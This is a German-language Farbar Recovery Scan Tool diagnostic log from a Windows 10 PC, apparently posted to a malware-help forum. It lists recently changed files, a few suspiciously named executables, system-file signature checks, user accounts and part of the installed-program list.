2019-02-11 22:16 - 2018-04-02 17:59 - 000000000 ____D C:\Program Files\AMD
2019-02-11 22:14 - 2018-09-06 22:17 - 000000000 ____D C:\Program Files (x86)\VulkanRT
2019-02-11 22:11 - 2018-04-02 17:59 - 000000000 ____D C:\AMD
2019-02-11 21:53 - 2018-09-06 21:50 - 000000000 ____D C:\Users\Fantacola\AppData\Local\CrashDumps
2019-02-11 21:19 - 2018-09-15 08:33 - 000000000 ___HD C:\WINDOWS\ELAMBKUP
2019-02-11 21:02 - 2018-12-18 17:46 - 000000000 ____D C:\Users\Fantacola
2019-02-11 20:31 - 2018-12-13 08:25 - 000000000 ____D C:\Users\Fantacola\Documents\Qlik
2019-02-11 19:58 - 2018-04-02 18:23 - 000000000 ___RD C:\Users\Fantacola\OneDrive - MerckGroup
2019-02-11 19:53 - 2018-11-24 16:13 - 000000000 ____D C:\WINDOWS\pss
2019-02-11 19:38 - 2018-12-18 18:05 - 000004210 _____ C:\WINDOWS\System32\Tasks\CCleaner Update
2019-02-11 17:05 - 2018-09-15 08:33 - 000000000 ____D C:\WINDOWS\AppReadiness
2019-02-10 23:00 - 2018-05-11 10:59 - 000000000 ____D C:\Users\Fantacola\AppData\Roaming\vlc
2019-02-10 22:37 - 2018-09-15 08:23 - 000000000 ____D C:\WINDOWS\CbsTemp
2019-02-10 21:06 - 2018-11-18 17:29 - 000000000 ____D C:\Program Files\CCleaner
2019-02-10 20:21 - 2018-09-15 08:33 - 000000000 ___HD C:\Program Files\WindowsApps
2019-02-10 20:21 - 2018-04-02 17:57 - 000000000 ____D C:\Users\Fantacola\AppData\Local\Packages
2019-02-10 20:19 - 2018-09-03 20:44 - 000002329 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk
2019-02-10 20:08 - 2018-06-29 13:15 - 000000000 ____D C:\ProgramData\boost_interprocess
2019-02-10 20:06 - 2018-09-15 08:33 - 000000000 ____D C:\WINDOWS\SysWOW64\GroupPolicy
2019-02-10 20:06 - 2017-09-29 14:46 - 000000000 ___HD C:\WINDOWS\system32\GroupPolicy
2019-02-10 12:21 - 2018-05-31 16:00 - 000000000 ____D C:\Users\Fantacola\AppData\Local\ElevatedDiagnostics
2019-02-10 12:04 - 2018-06-21 20:07 - 000000000 ____D C:\ProgramData\Packages
2019-02-10 11:55 - 2018-05-01 15:22 - 000000000 ____D C:\ProgramData\CanonIJPLM
2019-02-04 13:53 - 2018-10-15 18:54 - 000570784 _____ (Advanced Micro Devices, Inc.) C:\WINDOWS\system32\Rapidfire64.dll
2019-02-04 13:53 - 2018-10-15 18:54 - 000492448 _____ C:\WINDOWS\system32\dgtrayicon.exe
2019-02-04 13:53 - 2018-10-15 18:54 - 000481696 _____ (Advanced Micro Devices, Inc.) C:\WINDOWS\SysWOW64\Rapidfire.dll
2019-02-04 13:53 - 2018-10-15 18:54 - 000480160 _____ C:\WINDOWS\system32\GameManager64.dll
2019-02-04 13:53 - 2018-10-15 18:54 - 000382368 _____ C:\WINDOWS\SysWOW64\GameManager32.dll
2019-02-04 13:53 - 2018-10-15 18:54 - 000340896 _____ C:\WINDOWS\system32\clinfo.exe
2019-02-04 13:53 - 2018-10-15 18:54 - 000183712 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\system32\mantle64.dll
2019-02-04 13:53 - 2018-10-15 18:54 - 000162720 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\system32\mantleaxl64.dll
2019-02-04 13:53 - 2018-10-15 18:54 - 000151968 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\SysWOW64\mantle32.dll
2019-02-04 13:53 - 2018-10-15 18:54 - 000137632 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\SysWOW64\mantleaxl32.dll
2019-02-04 13:53 - 2018-10-15 18:54 - 000045984 _____ (Advanced Micro Devices, Inc.) C:\WINDOWS\system32\RapidFireServer64.dll
2019-02-04 13:53 - 2018-10-15 18:54 - 000042912 _____ (Advanced Micro Devices, Inc.) C:\WINDOWS\SysWOW64\RapidFireServer.dll
2019-02-04 13:53 - 2018-10-15 18:53 - 003735456 _____ (Advanced Micro Devices, Inc.) C:\WINDOWS\system32\amfrt64.dll
2019-02-04 13:53 - 2018-10-15 18:53 - 003363744 _____ (Advanced Micro Devices, Inc.) C:\WINDOWS\SysWOW64\amfrt32.dll
2019-02-04 13:53 - 2018-10-15 18:53 - 001662368 _____ (Advanced Micro Devices, Inc.) C:\WINDOWS\system32\atiadlxx.dll
2019-02-04 13:53 - 2018-10-15 18:53 - 001210784 _____ (Advanced Micro Devices, Inc.) C:\WINDOWS\SysWOW64\atiadlxy.dll
2019-02-04 13:53 - 2018-10-15 18:53 - 000757664 _____ (AMD) C:\WINDOWS\system32\atieclxx.exe
2019-02-04 13:53 - 2018-10-15 18:53 - 000552864 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\system32\amdmcl64.dll
2019-02-04 13:53 - 2018-10-15 18:53 - 000467872 _____ (Advanced Micro Devices, Inc.) C:\WINDOWS\system32\atidemgy.dll
2019-02-04 13:53 - 2018-10-15 18:53 - 000439712 _____ C:\WINDOWS\system32\atieah64.exe
2019-02-04 13:53 - 2018-10-15 18:53 - 000382880 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\SysWOW64\amdmcl32.dll
2019-02-04 13:53 - 2018-10-15 18:53 - 000353184 _____ C:\WINDOWS\SysWOW64\atieah32.exe
2019-02-04 13:53 - 2018-10-15 18:53 - 000240032 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\system32\atig6txx.dll
2019-02-04 13:53 - 2018-10-15 18:53 - 000211360 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\SysWOW64\atigktxx.dll
2019-02-04 13:53 - 2018-10-15 18:53 - 000169064 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\system32\aticfx64.dll
2019-02-04 13:53 - 2018-10-15 18:53 - 000158624 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\system32\atisamu64.dll
2019-02-04 13:53 - 2018-10-15 18:53 - 000147904 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\SysWOW64\aticfx32.dll
2019-02-04 13:53 - 2018-10-15 18:53 - 000135584 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\SysWOW64\atisamu32.dll
2019-02-04 13:53 - 2018-10-15 18:53 - 000127544 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\system32\atimpc64.dll
2019-02-04 13:53 - 2018-10-15 18:53 - 000124832 _____ (AMD) C:\WINDOWS\system32\atimuixx.dll
2019-02-04 13:53 - 2018-10-15 18:53 - 000123296 _____ C:\WINDOWS\system32\atidxx64.dll
2019-02-04 13:53 - 2018-10-15 18:53 - 000119712 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\system32\amdxc64.dll
2019-02-04 13:53 - 2018-10-15 18:53 - 000106648 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\SysWOW64\atimpc32.dll
2019-02-04 13:53 - 2018-10-15 18:53 - 000105888 _____ C:\WINDOWS\SysWOW64\atidxx32.dll
2019-02-04 13:53 - 2018-10-15 18:53 - 000104864 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\SysWOW64\amdxc32.dll
2019-02-04 13:53 - 2018-10-15 18:53 - 000069536 _____ (Advanced Micro Devices, Inc.) C:\WINDOWS\system32\ati2erec.dll
2019-02-04 13:52 - 2018-10-15 18:53 - 000922528 _____ (Advanced Micro Devices, Inc.) C:\WINDOWS\system32\amdlvr64.dll
2019-02-04 13:52 - 2018-10-15 18:53 - 000752544 _____ (Advanced Micro Devices, Inc.) C:\WINDOWS\SysWOW64\amdlvr32.dll
2019-02-04 13:52 - 2018-10-15 18:53 - 000546672 _____ C:\WINDOWS\system32\amdmiracast.dll
2019-02-04 13:52 - 2018-10-15 18:53 - 000474016 _____ C:\WINDOWS\system32\amdgfxinfo64.dll
2019-02-04 13:52 - 2018-10-15 18:53 - 000382368 _____ C:\WINDOWS\SysWOW64\amdgfxinfo32.dll
2019-02-04 13:52 - 2018-10-15 18:53 - 000189888 _____ (Advanced Micro Devices, Inc.) C:\WINDOWS\system32\amdhcp64.dll
2019-02-04 13:52 - 2018-10-15 18:53 - 000167000 _____ (Advanced Micro Devices, Inc.) C:\WINDOWS\SysWOW64\amdhcp32.dll
2019-02-04 13:52 - 2018-10-15 18:53 - 000133752 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\system32\amdave64.dll
2019-02-04 13:52 - 2018-10-15 18:53 - 000127544 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\system32\amdpcom64.dll
2019-02-04 13:52 - 2018-10-15 18:53 - 000118664 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\SysWOW64\amdave32.dll
2019-02-04 13:52 - 2018-10-15 18:53 - 000106648 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\SysWOW64\amdpcom32.dll
2019-02-01 23:03 - 2018-10-15 18:53 - 003471376 _____ C:\WINDOWS\SysWOW64\atiumdva.cap
2019-02-01 23:03 - 2018-10-15 18:53 - 003437632 _____ C:\WINDOWS\system32\atiumd6a.cap
2019-02-01 22:54 - 2018-10-15 18:53 - 000906872 _____ C:\WINDOWS\SysWOW64\atiapfxx.blb
2019-02-01 22:54 - 2018-10-15 18:53 - 000906872 _____ C:\WINDOWS\system32\atiapfxx.blb
2019-02-01 14:47 - 2018-04-02 20:56 - 000000000 ____D C:\Users\Fantacola\AppData\Local\Citrix
2019-02-01 07:36 - 2018-09-15 08:33 - 000000000 ____D C:\WINDOWS\system32\WinBioDatabase
2019-01-31 06:13 - 2018-04-02 17:57 - 000000000 __RHD C:\Users\Public\AccountPictures
2019-01-31 06:13 - 2018-04-02 17:57 - 000000000 ___RD C:\Users\Fantacola\3D Objects
2019-01-31 06:08 - 2018-09-15 08:33 - 000000000 ____D C:\WINDOWS\TextInput
2019-01-31 06:08 - 2018-09-15 08:33 - 000000000 ____D C:\WINDOWS\SysWOW64\oobe
2019-01-31 06:08 - 2018-09-15 08:33 - 000000000 ____D C:\WINDOWS\SysWOW64\Dism
2019-01-31 06:08 - 2018-09-15 08:33 - 000000000 ____D C:\WINDOWS\system32\oobe
2019-01-31 06:08 - 2018-09-15 08:33 - 000000000 ____D C:\WINDOWS\system32\migwiz
2019-01-31 06:08 - 2018-09-15 08:33 - 000000000 ____D C:\WINDOWS\system32\appraiser
2019-01-31 06:08 - 2018-09-15 08:33 - 000000000 ____D C:\WINDOWS\ShellExperiences
2019-01-31 06:08 - 2018-09-15 08:33 - 000000000 ____D C:\WINDOWS\ShellComponents
2019-01-31 06:08 - 2018-09-15 08:33 - 000000000 ____D C:\WINDOWS\bcastdvr
2019-01-31 06:08 - 2018-09-15 07:09 - 000000000 ____D C:\WINDOWS\system32\Dism
2019-01-30 17:41 - 2018-04-02 20:56 - 000000000 ____D C:\ProgramData\Citrix
2019-01-28 19:44 - 2018-04-07 18:18 - 000000000 _RSHD C:\ProgramData\Key-Base
2019-01-26 12:51 - 2018-05-04 15:55 - 000000000 ____D C:\Users\Fantacola\AppData\Roaming\MediaMonkey
2019-01-26 09:54 - 2018-12-24 13:31 - 000000000 ____D C:\Users\Fantacola\Documents\Sidify Music Converter
2019-01-26 09:50 - 2018-11-02 14:35 - 000000000 ____D C:\Users\Fantacola\AppData\Roaming\Sidify Music Converter
2019-01-24 21:38 - 2018-04-07 11:27 - 000000000 ____D C:\WINDOWS\system32\Drivers\wd
2019-01-24 20:11 - 2018-11-10 14:23 - 000002380 _____ C:\Users\Fantacola\Desktop\Microsoft Teams.lnk
2019-01-24 20:11 - 2018-11-10 14:23 - 000000000 ____D C:\Users\Fantacola\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Microsoft Corporation
2019-01-21 20:03 - 2018-04-02 17:57 - 000000000 ____D C:\Users\Fantacola\AppData\Local\ConnectedDevicesPlatform
2019-01-20 21:02 - 2018-11-02 14:35 - 000000000 ____D C:\Users\Fantacola\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Sidify
2019-01-19 18:11 - 2018-12-17 20:32 - 000000000 ____D C:\Program Files\Microsoft Silverlight
2019-01-19 18:11 - 2018-12-17 20:32 - 000000000 ____D C:\Program Files (x86)\Microsoft Silverlight
2019-01-18 13:45 - 2018-04-02 18:21 - 000000000 ____D C:\Users\Fantacola\AppData\Local\PlaceholderTileLogoFolder
2019-01-18 13:27 - 2018-12-26 09:46 - 000000000 ____D C:\Program Files\Common Files\LogiShrd
2019-01-16 15:54 - 2018-04-02 18:19 - 000000000 ____D C:\Users\Fantacola\AppData\Roaming\Skype
2019-01-16 07:48 - 2018-06-22 07:08 - 000001190 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\KeePass 2.lnk
2019-01-16 07:48 - 2018-06-22 07:08 - 000000000 ____D C:\Program Files (x86)\KeePass Password Safe 2
2019-01-15 22:17 - 2018-12-17 20:32 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Microsoft Silverlight
2019-01-15 16:14 - 2018-04-07 14:56 - 000000000 ____D C:\Users\Fantacola\AppData\Local\Google
2019-01-15 16:12 - 2018-11-02 15:22 - 000000000 ____D C:\Users\Fantacola\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\NoteBurner
2019-01-15 16:09 - 2019-01-03 22:52 - 000000000 ____D C:\Users\Fantacola\AppData\Roaming\5KPlayer
2019-01-15 16:08 - 2019-01-03 22:51 - 000000000 ____D C:\Program Files (x86)\DearMob
2019-01-15 16:04 - 2018-07-15 12:56 - 000000000 ____D C:\Program Files (x86)\Steam
2019-01-15 16:04 - 2018-04-28 12:50 - 000000000 ____D C:\Users\Fantacola\AppData\Roaming\TeamViewer
2019-01-15 16:02 - 2018-12-17 23:04 - 000000000 ___DC C:\WINDOWS\Panther
2019-01-15 15:58 - 2018-11-18 17:29 - 000000863 _____ C:\Users\Public\Desktop\CCleaner.lnk

==================== Dateien im Wurzelverzeichnis einiger Verzeichnisse =======

1601-01-03 21:26 - 1601-01-03 21:26 - 000078336 ____N (Microsoft Corporation) C:\Program Files (x86)\Common Files\oIOi.exe
1601-01-03 21:26 - 1601-01-03 21:26 - 000181760 ____N (Microsoft Corporation) C:\Program Files (x86)\Common Files\OlXeKbnaeAO.exe
2019-02-10 21:57 - 2019-02-10 21:57 - 006161408 _____ () C:\Users\Fantacola\AppData\Local\dump007.dat
2018-05-01 15:37 - 2018-05-01 15:37 - 000000846 _____ () C:\Users\Fantacola\AppData\Local\recently-used.xbel
2019-02-10 20:07 - 2019-02-10 20:07 - 000000003 _____ () C:\Users\Fantacola\AppData\Local\wbem.ini

Einige Dateien in TEMP:
====================
2019-02-10 21:57 - 2019-02-11 22:42 - 000000000 ____D () C:\Users\Fantacola\AppData\Local\Temp\ImagingEngine.dll
2019-02-11 22:04 - 2019-02-11 04:01 - 000858912 _____ (Malwarebytes) C:\Users\Fantacola\AppData\Local\Temp\mb-clean.exe
2019-02-11 22:04 - 2019-02-11 22:04 - 064531912 _____ (Malwarebytes                                                ) C:\Users\Fantacola\AppData\Local\Temp\mb-setup.exe
2019-02-11 21:08 - 2019-02-11 21:08 - 064513784 _____ (Malwarebytes                                                ) C:\Users\Fantacola\AppData\Local\Temp\mb3-setup-adwc.adwc1003.7.1.2839-1.0.538-1.0.9186.exe

==================== Bamital & volsnap ======================

(Es ist kein automatischer Fix für Dateien vorhanden, die an der Verifikation gescheitert sind.)

C:\WINDOWS\system32\winlogon.exe => Datei ist digital signiert
C:\WINDOWS\system32\wininit.exe => Datei ist digital signiert
C:\WINDOWS\explorer.exe => Datei ist digital signiert
C:\WINDOWS\SysWOW64\explorer.exe => Datei ist digital signiert
C:\WINDOWS\system32\svchost.exe => Datei ist digital signiert
C:\WINDOWS\SysWOW64\svchost.exe => Datei ist digital signiert
C:\WINDOWS\system32\services.exe => Datei ist digital signiert
C:\WINDOWS\system32\User32.dll => Datei ist digital signiert
C:\WINDOWS\SysWOW64\User32.dll => Datei ist digital signiert
C:\WINDOWS\system32\userinit.exe => Datei ist digital signiert
C:\WINDOWS\SysWOW64\userinit.exe => Datei ist digital signiert
C:\WINDOWS\system32\rpcss.dll => Datei ist digital signiert
C:\WINDOWS\system32\dnsapi.dll => Datei ist digital signiert
C:\WINDOWS\SysWOW64\dnsapi.dll => Datei ist digital signiert
C:\WINDOWS\system32\dllhost.exe => Datei ist digital signiert
C:\WINDOWS\SysWOW64\dllhost.exe => Datei ist digital signiert
C:\WINDOWS\system32\Drivers\volsnap.sys => Datei ist digital signiert

==================== Ende von FRST.txt ============================

fantacola 12.02.2019 08:43
Addition log ,ADWCleaner log, malkwarebytes log
 
Code:
Zusätzliches Untersuchungsergebnis von Farbar Recovery Scan Tool (x64) Version: 10.02.2019 01
durchgeführt von Fantacola (12-02-2019 08:10:42)
Gestartet von C:\Users\Fantacola\Desktop
Windows 10 Home Version 1809 17763.292 (X64) (2018-12-18 17:06:54)
Start-Modus: Safe Mode (with Networking)
==========================================================


==================== Konten: =============================

Administrator (S-1-5-21-3149852207-3418298431-2824610350-500 - Administrator - Disabled)
DefaultAccount (S-1-5-21-3149852207-3418298431-2824610350-503 - Limited - Disabled)
Fantacola (S-1-5-21-3149852207-3418298431-2824610350-1001 - Administrator - Enabled) => C:\Users\Fantacola
Gast (S-1-5-21-3149852207-3418298431-2824610350-501 - Limited - Disabled)
WDAGUtilityAccount (S-1-5-21-3149852207-3418298431-2824610350-504 - Limited - Disabled)

==================== Sicherheits-Center ========================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er entfernt.)

AV: Windows Defender (Enabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
AS: Windows Defender (Enabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}

==================== Installierte Programme ======================

(Nur Adware-Programme mit dem Zusatz "Hidden" können in die Fixlist aufgenommen werden, um sie sichtbar zu machen. Die Adware-Programme sollten manuell deinstalliert werden.)

7-Zip 18.05 (x64) (HKLM\...\7-Zip) (Version: 18.05 - Igor Pavlov)
Adobe Acrobat Reader DC - Deutsch (HKLM-x32\...\{AC76BA86-7AD7-1031-7B44-AC0F074E4100}) (Version: 19.010.20069 - Adobe Systems Incorporated)
Adobe Lightroom (HKLM-x32\...\{8048A5DF-8A70-5BE1-954B-E0FDE1BD0D0D}) (Version: 6.0 - Adobe Systems Incorporated)
AMD Software (HKLM\...\AMD Catalyst Install Manager) (Version: 19.2.1 - Advanced Micro Devices, Inc.)
Apple Application Support (64-Bit) (HKLM\...\{5905C8CF-1C88-4478-A48E-4E458AD1BC7E}) (Version: 5.0.1 - Apple Inc.)
Application Verifier x64 External Package (HKLM\...\{62CB44B2-8007-DBB2-1CBA-5CB7309EB3C3}) (Version: 10.1.17134.12 - Microsoft) Hidden
Assassin's Creed Odyssey (HKLM-x32\...\{B7EC622B-1979-450E-8281-C5648506DB83}_is1) (Version:  - Ubisoft)
Blue Jeans (HKLM-x32\...\{9D08597F-4750-4CEA-A7AB-0C0208473661}) (Version: 1.34.28 - Blue Jeans)
Bonjour (HKLM\...\{56DDDFB8-7F79-4480-89D5-25E1F52AB28F}) (Version: 3.1.0.1 - Apple Inc.)
Branding64 (HKLM\...\{EE2AFCE4-0238-4DE0-A140-1647021627C1}) (Version: 1.00.0001 - Advanced Micro Devices, Inc.) Hidden
calibre (HKLM-x32\...\{80B99AE8-4116-4321-877D-A7A063C6D329}) (Version: 3.27.1 - Kovid Goyal)
Canon IJ Network Scanner Selector EX (HKLM-x32\...\Canon_IJ_Network_Scanner_Selector_EX) (Version: 1.5.4.4 - Canon Inc.)
Canon IJ Network Tool (HKLM-x32\...\Canon_IJ_Network_UTILITY) (Version: 3.7.0 - Canon Inc.)
Canon IJ Scan Utility (HKLM-x32\...\Canon_IJ_Scan_Utility) (Version: 1.1.20.13 - Canon Inc.)
Canon Inkjet Printer/Scanner/Fax Extended Survey Program (HKLM-x32\...\CANONIJPLM100) (Version: 5.5.0 - Canon Inc.)
Canon MG7700 series Benutzerregistrierung (HKLM-x32\...\Canon MG7700 series Benutzerregistrierung) (Version:  - *Canon Inc.)
Canon MG7700 series MP Drivers (HKLM\...\{1199FAD5-9546-44f3-81CF-FFDB8040B7BF}_Canon_MG7700_series) (Version: 1.00 - Canon Inc.)
Catalyst Control Center Next Localization BR (HKLM\...\{A16E186C-58C4-3BDC-5CCE-714EFEF5F27F}) (Version: 2017.0922.1659.28737 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization BR (HKLM\...\{E7AA1A02-575C-14C6-FBEF-4BE6D46A5B74}) (Version: 2017.0424.2119.36535 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization CHS (HKLM\...\{E42911E5-48F8-8557-ED20-D72AD1907D25}) (Version: 2017.0922.1659.28737 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization CHS (HKLM\...\{EB6C44F1-0F78-FE10-BC63-90BA50AB0CE9}) (Version: 2017.0424.2119.36535 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization CHT (HKLM\...\{B26D75B8-FAB7-6F8B-767F-BAF975383D91}) (Version: 2017.0424.2119.36535 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization CHT (HKLM\...\{B4C30EF4-B2C5-1395-B534-7B63BCB6E8E4}) (Version: 2017.0922.1659.28737 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization CS (HKLM\...\{36EDC500-E4C0-371C-9865-08450415C1E9}) (Version: 2017.0424.2119.36535 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization CS (HKLM\...\{62098A5F-E03B-31A3-5F9C-51A7F7D25744}) (Version: 2017.0922.1659.28737 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization DA (HKLM\...\{1757AD9B-0E3C-05F9-FE43-4343BED7DA85}) (Version: 2017.0922.1659.28737 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization DA (HKLM\...\{4C2FB7FD-89FD-BA5C-585A-3811F326AD34}) (Version: 2017.0424.2119.36535 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization DE (HKLM\...\{66B06F29-EE4F-9130-D96A-754826093FEA}) (Version: 2017.0922.1659.28737 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization DE (HKLM\...\{D74218A3-C503-57EF-AC9F-2220082E7ADE}) (Version: 2017.0424.2119.36535 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization EL (HKLM\...\{821D0A0E-F246-BE40-0D68-93883C14C410}) (Version: 2017.0922.1659.28737 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization EL (HKLM\...\{DA433FCF-90A1-19A5-65A7-FDF82DE4826D}) (Version: 2017.0424.2119.36535 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization ES (HKLM\...\{88BD74C4-23AB-4554-915C-6E1F0C81F6CD}) (Version: 2017.0922.1659.28737 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization ES (HKLM\...\{949F125B-A6CC-5A5E-EEE7-4AC50305C1FA}) (Version: 2017.0424.2119.36535 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization FI (HKLM\...\{20D46801-147B-30AD-7C5A-AC4560A79096}) (Version: 2017.0424.2119.36535 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization FI (HKLM\...\{A48E2AB0-0866-7783-9657-E1709EB18D02}) (Version: 2017.0922.1659.28737 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization FR (HKLM\...\{22C39711-2747-D264-319A-1550BEEAAEC6}) (Version: 2017.0424.2119.36535 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization FR (HKLM\...\{E61CEF9A-BAC3-EAEE-F735-E257D2354DF2}) (Version: 2017.0922.1659.28737 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization HU (HKLM\...\{1DBACFDB-5E43-7882-36BD-53526D34BD22}) (Version: 2017.0424.2119.36535 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization HU (HKLM\...\{DA0326BB-657D-AAFC-752C-363E8FA33755}) (Version: 2017.0922.1659.28737 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization IT (HKLM\...\{A91FC4BF-C1EC-ADCA-79D1-F4F0671F1D60}) (Version: 2017.0424.2119.36535 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization IT (HKLM\...\{B873A1FB-5EA0-EE5F-A861-1E38880AD08E}) (Version: 2017.0922.1659.28737 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization JA (HKLM\...\{EC9DF9FF-9D75-4CDD-1D58-A2E887B0A42E}) (Version: 2017.0922.1659.28737 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization JA (HKLM\...\{ED75A775-03A7-F214-868D-497748707968}) (Version: 2017.0424.2119.36535 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization KO (HKLM\...\{07BFBD5C-2F63-6828-1B61-B41A44113F3B}) (Version: 2017.0424.2119.36535 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization KO (HKLM\...\{7ABACA7E-6E59-0EF9-8FA3-6B32E5F58127}) (Version: 2017.0922.1659.28737 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization NL (HKLM\...\{3E196AAF-F81C-B384-E2AB-28EE2398FE5F}) (Version: 2017.0922.1659.28737 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization NL (HKLM\...\{E6038D3E-5D87-8DF7-6D05-BE7532C3E73E}) (Version: 2017.0424.2119.36535 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization NO (HKLM\...\{DAEFFE0C-CD05-1355-6AFC-7B3D4106A820}) (Version: 2017.0922.1659.28737 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization NO (HKLM\...\{DFAD9DAC-4768-C8BB-4E0E-5239605A9BEA}) (Version: 2017.0424.2119.36535 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization PL (HKLM\...\{E392A425-53A7-DF90-96A0-E287A75DD3B2}) (Version: 2017.0922.1659.28737 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization PL (HKLM\...\{FFBFBD1F-B160-A119-7C43-8584FA2E5665}) (Version: 2017.0424.2119.36535 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization RU (HKLM\...\{4D1D5407-9B69-6422-629C-8518A26004A4}) (Version: 2017.0424.2119.36535 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization RU (HKLM\...\{D6F47BB4-700A-F612-0671-5F69EA311BB7}) (Version: 2017.0922.1659.28737 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization SV (HKLM\...\{01FD9A26-3F61-9236-B360-BE5D043D82C0}) (Version: 2017.0922.1659.28737 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization SV (HKLM\...\{A8379BAB-59A9-C0A3-8BCC-4852EA403692}) (Version: 2017.0424.2119.36535 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization TH (HKLM\...\{24DF617A-CD23-6E6A-126B-23630D2781CE}) (Version: 2017.0424.2119.36535 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization TH (HKLM\...\{64D4CCC3-63DF-252D-D29D-03491670225D}) (Version: 2017.0922.1659.28737 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization TR (HKLM\...\{83DDDFD8-AD42-72F9-E4F1-5456FDB304C9}) (Version: 2017.0424.2119.36535 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization TR (HKLM\...\{8DF90937-B869-9F76-5D45-5A8BDA0A33B6}) (Version: 2017.0922.1659.28737 - Advanced Micro Devices, Inc.) Hidden
CCleaner (HKLM\...\CCleaner) (Version: 5.51 - Piriform)
Citrix Workspace 1812 (HKLM-x32\...\CitrixOnlinePluginPackWeb) (Version: 18.12.0.12 - Citrix Systems, Inc.)
EaseUS Partition Master 12.10 (HKLM-x32\...\EaseUS Partition Master_is1) (Version:  - EaseUS)
Epic Games Launcher (HKLM-x32\...\{AF7881ED-41D7-4ECA-8C7C-AE10DFA0E489}) (Version: 1.1.151.0 - Epic Games, Inc.)
Epic Games Launcher Prerequisites (x64) (HKLM\...\{66C5838F-B854-4A55-89E6-A6138747A4DF}) (Version: 1.0.0.0 - Epic Games, Inc.) Hidden
GatewayComponents (HKLM\...\{ED55C428-F81B-47EB-A261-5882EFEDB3AD}) (Version: 15.0.265 - Microsoft Corporation) Hidden
Google Chrome (HKLM-x32\...\Google Chrome) (Version: 71.0.3578.98 - Google Inc.)
Google Earth Pro (HKLM\...\{E466DA1C-39B7-4FA7-98F5-3B7910976C3D}) (Version: 7.3.2.5495 - Google)
Google Update Helper (HKLM-x32\...\{60EC980A-BDA2-4CB6-A427-B07A5498B4CA}) (Version: 1.3.33.23 - Google Inc.) Hidden
Google Update Helper (HKLM-x32\...\{A92DAB39-4E2C-4304-9AB6-BC44E68B55E2}) (Version: 1.3.25.3 - Google Inc.) Hidden
HeadSetup™ Pro (HKLM-x32\...\{AD4FF5FA-C117-486F-9C06-E24D96D4A873}) (Version: 2.7.9416 - Sennheiser Communications A/S)
Intel(R) Management Engine Components (HKLM\...\{1CEAC85D-2590-4760-800F-8DE5E91F3700}) (Version: 1846.12.0.1177 - Intel Corporation)
